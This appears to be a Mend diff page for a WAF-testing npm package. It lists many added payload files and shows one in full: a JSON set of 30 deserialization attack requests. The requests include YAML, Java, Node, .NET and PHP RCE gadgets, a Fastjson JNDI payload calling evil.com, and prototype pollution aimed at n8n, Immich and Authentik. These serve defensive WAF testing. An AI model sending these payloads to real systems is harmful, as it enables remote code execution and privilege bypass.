npm - @waftester/cli - Versions diffs - 2.8.0 - Mend

@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (141) hide show

package/LICENSE +80 -0
package/LICENSE-COMMUNITY +28 -0
package/README.md +121 -0
package/bin/cli.js +152 -0
package/package.json +52 -0
package/payloads/community/README.md +45 -0
package/payloads/community/ai/ml-poisoning.json +173 -0
package/payloads/community/ai/prompt-injection.json +247 -0
package/payloads/community/ai/workflow-abuse.json +222 -0
package/payloads/community/auth/jwt.json +855 -0
package/payloads/community/auth/login-bypass.json +623 -0
package/payloads/community/auth/mfa.json +402 -0
package/payloads/community/auth/oauth.json +421 -0
package/payloads/community/auth/open-redirect.json +1028 -0
package/payloads/community/auth/session.json +404 -0
package/payloads/community/cache/deception.json +402 -0
package/payloads/community/cache/poisoning.json +403 -0
package/payloads/community/deserialization/gadget.json +375 -0
package/payloads/community/deserialization/prototype.json +370 -0
package/payloads/community/fuzz/content-type.json +397 -0
package/payloads/community/fuzz/headers.json +401 -0
package/payloads/community/fuzz/methods.json +397 -0
package/payloads/community/fuzz/obfuscation.json +362 -0
package/payloads/community/fuzz/special-chars.json +740 -0
package/payloads/community/fuzz/waf-bypass.json +452 -0
package/payloads/community/graphql/batching-abuse.json +271 -0
package/payloads/community/graphql/depth-limit.json +271 -0
package/payloads/community/graphql/introspection.json +267 -0
package/payloads/community/injection/crlf.json +569 -0
package/payloads/community/injection/ldap.json +357 -0
package/payloads/community/injection/nosqli.json +529 -0
package/payloads/community/injection/oscmd.json +662 -0
package/payloads/community/injection/rce-polyglots.json +452 -0
package/payloads/community/injection/sqli.json +681 -0
package/payloads/community/injection/ssti.json +584 -0
package/payloads/community/injection/upload-attacks.json +632 -0
package/payloads/community/injection/xpath.json +357 -0
package/payloads/community/injection/xxe.json +716 -0
package/payloads/community/logic/forced-browsing.json +405 -0
package/payloads/community/logic/idor.json +1026 -0
package/payloads/community/logic/privilege.json +337 -0
package/payloads/community/media/exif-injection.json +225 -0
package/payloads/community/media/metadata-poison.json +239 -0
package/payloads/community/protocol/http-smuggling.json +798 -0
package/payloads/community/protocol/http2-attacks.json +382 -0
package/payloads/community/protocol/websocket-abuse.json +375 -0
package/payloads/community/rate-limit/burst-simulation.json +286 -0
package/payloads/community/rate-limit/bypass-attempts.json +326 -0
package/payloads/community/rate-limit/zone-tests.json +332 -0
package/payloads/community/services/authentik.json +415 -0
package/payloads/community/services/immich.json +423 -0
package/payloads/community/services/n8n.json +366 -0
package/payloads/community/sqli-basic.json +182 -0
package/payloads/community/ssrf/cloud-metadata.json +999 -0
package/payloads/community/ssrf/dns-rebinding.json +503 -0
package/payloads/community/ssrf/internal-networks.json +627 -0
package/payloads/community/ssrf/protocol-smuggling.json +350 -0
package/payloads/community/ssti/multi-language-templates.json +191 -0
package/payloads/community/ssti/python-templates.json +200 -0
package/payloads/community/traversal/basic.json +675 -0
package/payloads/community/traversal/cloud-credentials.json +107 -0
package/payloads/community/traversal/config-files.json +193 -0
package/payloads/community/traversal/encoding.json +558 -0
package/payloads/community/traversal/null-byte.json +105 -0
package/payloads/community/traversal/symlink.json +93 -0
package/payloads/community/traversal/unicode.json +134 -0
package/payloads/community/traversal/unix-advanced.json +195 -0
package/payloads/community/traversal/windows-advanced.json +195 -0
package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
package/payloads/community/waf-bypass/unicode-charset.json +152 -0
package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
package/payloads/community/waf-validation/README.md +172 -0
package/payloads/community/waf-validation/bypass-techniques.json +272 -0
package/payloads/community/waf-validation/custom-rules.json +952 -0
package/payloads/community/waf-validation/evasion-techniques.json +272 -0
package/payloads/community/waf-validation/modsecurity-core.json +151 -0
package/payloads/community/waf-validation/owasp-top10.json +236 -0
package/payloads/community/waf-validation/regression-tests.json +227 -0
package/payloads/community/xss/csp-bypass.json +431 -0
package/payloads/community/xss/dom.json +389 -0
package/payloads/community/xss/filter-bypass.json +1242 -0
package/payloads/community/xss/mutation.json +263 -0
package/payloads/community/xss/polyglots.json +371 -0
package/payloads/community/xss/reflected.json +187 -0
package/payloads/community/xss/stored.json +330 -0
package/payloads/crlf-injection.json +182 -0
package/payloads/ids-map.json +155 -0
package/payloads/ldap-injection.json +182 -0
package/payloads/nosql-injection.json +227 -0
package/payloads/prototype-pollution.json +182 -0
package/payloads/request-smuggling.json +182 -0
package/payloads/version.json +28 -0
package/payloads/xss-advanced.json +227 -0
package/templates/README.md +221 -0
package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
package/templates/output/asff.tmpl +61 -0
package/templates/output/csv.tmpl +4 -0
package/templates/output/junit.tmpl +34 -0
package/templates/output/markdown-report.tmpl +92 -0
package/templates/output/slack-notification.tmpl +95 -0
package/templates/output/text-summary.tmpl +56 -0
package/templates/overrides/api-only.yaml +130 -0
package/templates/overrides/crs-tuning.yaml +204 -0
package/templates/overrides/false-positive-suppression.yaml +159 -0
package/templates/policies/owasp-top10.yaml +152 -0
package/templates/policies/pci-dss.yaml +124 -0
package/templates/policies/permissive.yaml +40 -0
package/templates/policies/standard.yaml +57 -0
package/templates/policies/strict.yaml +72 -0
package/templates/report-configs/compliance.yaml +173 -0
package/templates/report-configs/dark.yaml +136 -0
package/templates/report-configs/enterprise.yaml +175 -0
package/templates/report-configs/minimal.yaml +84 -0
package/templates/report-configs/print.yaml +139 -0
package/templates/workflows/api-scan.yaml +132 -0
package/templates/workflows/ci-gate.yaml +129 -0
package/templates/workflows/full-scan.yaml +133 -0
package/templates/workflows/quick-probe.yaml +80 -0
package/templates/workflows/waf-detection.yaml +89 -0

package/payloads/community/deserialization/gadget.json ADDED Viewed

@@ -0,0 +1,375 @@
+[
+  {
+      "id": "DESER-GADGET-001",
+      "payload": "POST /api/import HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"rce\":\"_$$ND_FUNC$$_function(){require('child_process').exec('ls')}()\"}",
+      "tags": [
+        "deserialization",
+        "gadget",
+        "node-serialize",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Node.js node-serialize RCE gadget marker",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-002",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/xml\r\n\r\n<?xml version=\"1.0\"?><root><name>test</name></root>",
+      "tags": [
+        "gadget",
+        "content-type-confusion"
+    ],
+      "expected_block": false,
+      "severity_hint": "Medium",
+      "notes": "XML body with JSON Content-Type (no attack, testing parser confusion)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-003",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/xml\r\n\r\n{\"test\":\"json\"}",
+      "tags": [
+        "gadget",
+        "content-type-confusion"
+    ],
+      "expected_block": false,
+      "severity_hint": "Medium",
+      "notes": "JSON body with XML Content-Type (reverse confusion)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-004",
+      "payload": "POST /api/config HTTP/1.1\r\nHost: target.com\r\nContent-Type: text/plain\r\n\r\n{\"__proto__\":{\"admin\":true}}",
+      "tags": [
+        "gadget",
+        "content-type-confusion"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Prototype pollution with text/plain Content-Type",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-005",
+      "payload": "POST /api/yaml HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/x-yaml\r\n\r\n!!python/object/apply:os.system ['ls']",
+      "tags": [
+        "gadget",
+        "yaml-deserialization",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "YAML deserialization with Python gadget (PyYAML unsafe load)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-006",
+      "payload": "POST /api/import HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/x-yaml\r\n\r\n!!python/object/new:subprocess.Popen ['ls']",
+      "tags": [
+        "gadget",
+        "yaml-deserialization",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "YAML subprocess.Popen gadget",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-007",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/x-yaml\r\n\r\n!!python/object/apply:eval ['__import__(\"os\").system(\"ls\")']",
+      "tags": [
+        "gadget",
+        "yaml-deserialization"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "YAML eval gadget with os.system",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-008",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/java-serialized-object\r\n\r\nrO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA/b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAmXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAA",
+      "tags": [
+        "gadget",
+        "java-serialization",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Java serialized object (CommonsCollections gadget marker)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-009",
+      "payload": "POST /api/import HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/x-java-serialized-object\r\n\r\nac ed 00 05 73 72 00 11 6a 61 76 61 2e 75 74 69 6c 2e 48 61 73 68 4d 61 70",
+      "tags": [
+        "gadget",
+        "java-serialization"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Java HashMap serialization magic bytes (ac ed 00 05)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-010",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/x-php-serialized\r\n\r\nO:8:\"stdClass\":1:{s:4:\"data\";s:5:\"value\";}",
+      "tags": [
+        "gadget",
+        "php-serialization"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "PHP serialized object (harmless stdClass)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-011",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\nO:10:\"PentesterLab\":1:{s:4:\"file\";s:9:\"/etc/passwd\";}",
+      "tags": [
+        "gadget",
+        "php-object-injection",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PHP object injection with file property (gadget marker)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-012",
+      "payload": "POST /api/config HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\nO:8:\"Exploit\":2:{s:7:\"command\";s:2:\"ls\";s:4:\"exec\";b:1;}",
+      "tags": [
+        "gadget",
+        "php-object-injection",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "PHP object with command property (RCE gadget marker)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-013",
+      "payload": "POST /api/user HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"@type\":\"java.net.Inet4Address\",\"val\":\"127.0.0.1\"}",
+      "tags": [
+        "gadget",
+        "fastjson-deserialization"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Fastjson deserialization gadget (@type Inet4Address)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-014",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://evil.com/Exploit\"}",
+      "tags": [
+        "gadget",
+        "fastjson-deserialization",
+        "jndi-injection",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Fastjson JNDI injection via JdbcRowSetImpl",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-015",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"@c\":\"com.example.Exploit\",\"cmd\":\"calc\"}",
+      "tags": [
+        "gadget",
+        "jackson-polymorphic"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Jackson polymorphic deserialization (@c type hint)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-016",
+      "payload": "POST /api/config HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n[\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",{\"transletBytecodes\":[\"base64payload\"]}]",
+      "tags": [
+        "gadget",
+        "jackson-gadget",
+        "templatesimpl"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Jackson TemplatesImpl gadget (Java code execution)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-017",
+      "payload": "POST /api/import HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"$type\":\"System.Windows.Data.ObjectDataProvider, PresentationFramework\",\"MethodName\":\"Start\"}",
+      "tags": [
+        "gadget",
+        "dotnet-deserialization",
+        "critical"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": ".NET ObjectDataProvider deserialization gadget",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-018",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"__type\":\"System.IO.FileInfo\",\"FileName\":\"/etc/passwd\"}",
+      "tags": [
+        "gadget",
+        "dotnet-deserialization"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": ".NET FileInfo type hint (file access gadget)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-019",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"ruby/object\":\"Gem::Specification\",\"data\":\"malicious_code\"}",
+      "tags": [
+        "gadget",
+        "ruby-marshal"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Ruby Marshal gadget (Gem::Specification abuse)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-020",
+      "payload": "POST /api/config HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"ruby/object\":\"Gem::Installer\",\"spec\":\"malicious_spec\"}",
+      "tags": [
+        "gadget",
+        "ruby-marshal"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Ruby Gem::Installer gadget",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-021",
+      "payload": "POST /api/user HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json; charset=utf-16\r\n\r\n{\"test\":\"value\"}",
+      "tags": [
+        "gadget",
+        "charset-confusion"
+    ],
+      "expected_block": false,
+      "severity_hint": "Medium",
+      "notes": "UTF-16 charset confusion (parser bypass attempt)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-022",
+      "payload": "POST /api/data HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json; boundary=----Boundary\r\n\r\n{\"test\":\"value\"}",
+      "tags": [
+        "gadget",
+        "boundary-confusion"
+    ],
+      "expected_block": false,
+      "severity_hint": "Low",
+      "notes": "Invalid boundary parameter in JSON Content-Type",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-023",
+      "payload": "POST /api/settings HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\nContent-Type: application/xml\r\n\r\n{\"test\":\"value\"}",
+      "tags": [
+        "gadget",
+        "duplicate-content-type"
+    ],
+      "expected_block": false,
+      "severity_hint": "Medium",
+      "notes": "Duplicate Content-Type headers (parser confusion)",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-024",
+      "payload": "POST /api/config HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\nX-Content-Type-Options: nosniff\r\n\r\n<xml><data>test</data></xml>",
+      "tags": [
+        "gadget",
+        "mime-sniffing"
+    ],
+      "expected_block": false,
+      "severity_hint": "Medium",
+      "notes": "XML body with JSON Content-Type and nosniff",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-025",
+      "payload": "POST /api/workflow HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"nodes\":[{\"type\":\"function\",\"code\":\"return {json: {polluted: true}};\"}]}",
+      "tags": [
+        "gadget",
+        "n8n-workflow",
+        "code-injection"
+    ],
+      "expected_block": true,
+      "severity_hint": "High",
+      "notes": "n8n workflow with function node containing pollution",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-026",
+      "payload": "POST /api/execute HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"expression\":\"{{$json.__proto__.admin = true}}\"}",
+      "tags": [
+        "gadget",
+        "n8n-expression",
+        "template-injection"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "n8n expression with __proto__ pollution",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-027",
+      "payload": "POST /api/photos/upload HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"metadata\":{\"__proto__\":{\"isPublic\":true}}}",
+      "tags": [
+        "gadget",
+        "immich-metadata"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Immich photo metadata pollution",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-028",
+      "payload": "POST /api/albums HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"settings\":{\"constructor\":{\"prototype\":{\"shared\":true}}}}",
+      "tags": [
+        "gadget",
+        "immich-album"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Immich album settings pollution via constructor",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-029",
+      "payload": "POST /api/flows HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"stages\":[{\"__proto__\":{\"bypass\":true}}]}",
+      "tags": [
+        "gadget",
+        "authentik-flow"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Authentik flow stage pollution",
+      "category": "Deserialization"
+  },
+  {
+      "id": "DESER-GADGET-030",
+      "payload": "POST /api/policies HTTP/1.1\r\nHost: target.com\r\nContent-Type: application/json\r\n\r\n{\"bindings\":[{\"__proto__\":{\"enabled\":false}}]}",
+      "tags": [
+        "gadget",
+        "authentik-policy"
+    ],
+      "expected_block": true,
+      "severity_hint": "Critical",
+      "notes": "Authentik policy binding pollution to disable security",
+      "category": "Deserialization"
+  }
+]